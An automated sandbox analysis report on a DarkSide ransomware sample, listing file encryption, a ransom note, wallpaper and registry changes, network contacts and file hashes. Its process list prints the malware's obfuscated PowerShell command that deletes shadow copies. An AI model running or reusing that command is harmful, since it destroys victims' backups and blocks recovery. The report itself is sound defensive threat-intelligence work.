Analysis Overview
SHA256
4d9432e8a0ceb64c34b13d550251b8d9478ca784e50105dc0d729490fb861d1a
Threat Level: Known bad
The file PurchaseOrderPoster.bin was found to be: Known bad.
Malicious Activity Summary
DarkSide
Modifies extensions of user files
UPX packed file
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
Modifies registry class
Opens file in notepad (likely ransom note)
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies Control Panel
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-10-01 10:21
Signatures
UPX packed file
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2021-10-01 10:21
Reported
2021-10-01 10:24
Platform
win10-en-20210920
Max time kernel
149s
Max time network
152s
Command Line
Signatures
DarkSide
Modifies extensions of user files
| Description | Indicator | Process | Target |
|---|---|---|---|
| File renamed | C:\Users\Admin\Pictures\CompleteConvertFrom.raw => C:\Users\Admin\Pictures\CompleteConvertFrom.raw.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CompleteConvertFrom.raw.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ExportInstall.tif => C:\Users\Admin\Pictures\ExportInstall.tif.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ExportInstall.tif.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\PopFind.raw => C:\Users\Admin\Pictures\PopFind.raw.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\PopFind.raw.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ResolveUninstall.tif.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\BackupConvertFrom.tif => C:\Users\Admin\Pictures\BackupConvertFrom.tif.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\BackupConvertFrom.tif.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ExportHide.raw => C:\Users\Admin\Pictures\ExportHide.raw.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ResolveUninstall.tif => C:\Users\Admin\Pictures\ResolveUninstall.tif.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UnpublishRequest.tif => C:\Users\Admin\Pictures\UnpublishRequest.tif.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\UnpublishRequest.tif.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\AssertInvoke.png => C:\Users\Admin\Pictures\AssertInvoke.png.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\AssertInvoke.png.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ExportHide.raw.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\ae8bdb72.BMP" | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\ae8bdb72.BMP" | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ae8bdb72\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\ae8bdb72.ico" | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.ae8bdb72\ = "ae8bdb72" | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ae8bdb72\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 2168 wrote to memory of 3700 | N/A | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2168 wrote to memory of 3700 | N/A | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe
"C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\README.ae8bdb72.TXT
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | catsdegree.com | udp |
| US | 72.52.178.23:443 | catsdegree.com | tcp |
| US | 8.8.8.8:53 | 17.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.1.127.10.in-addr.arpa | udp |
| US | 72.52.178.23:443 | catsdegree.com | tcp |
| FR | 2.18.105.186:443 | N/A | tcp |
Files
memory/3700-115-0x0000000000000000-mapping.dmp
memory/3700-121-0x0000029FCC760000-0x0000029FCC761000-memory.dmp
memory/3700-126-0x0000029FE6BA0000-0x0000029FE6BA1000-memory.dmp
memory/3700-131-0x0000029FCC6F0000-0x0000029FCC6F2000-memory.dmp
memory/3700-133-0x0000029FCC6F6000-0x0000029FCC6F8000-memory.dmp
memory/3700-132-0x0000029FCC6F3000-0x0000029FCC6F5000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ea6243fdb2bfcca2211884b0a21a0afc |
| SHA1 | 2eee5232ca6acc33c3e7de03900e890f4adf0f2f |
| SHA256 | 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8 |
| SHA512 | 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 618a15a86c763cc6ac1a9efc9332ff6f |
| SHA1 | 574c8c0c8be023f4bf4fba1cc29f4bccc8253cb7 |
| SHA256 | 4591d24d98cf7c51ef6da5330d2f017acfb5aa7d1ec9822231903daed53412dc |
| SHA512 | 42993e4c55e76aa4fef8be22788f8b93b67428e7851136cfdb1db2134358aaeb22e2f3cfb331460aee16e9c119ff0f12b387b603dfbd0d47e736fa741e848646 |
C:\Users\Admin\Desktop\README.ae8bdb72.TXT
| MD5 | f418a249405444da33cc73b402a26306 |
| SHA1 | 1a6c493e74036f93f0dae4b65e6c543c213ce418 |
| SHA256 | b348457b3cd38a91d113b0dfbf5bdf9d830b39f5ab849b126fff027534ef2e09 |
| SHA512 | b848dd2bb5654aac30d36279af1b9460b36c2df9c8f696d5349a870cd9be8b0aac203623c2025e8b32e646b0558ee27cf72e04db6aee3a2cd548d5c29575efaf |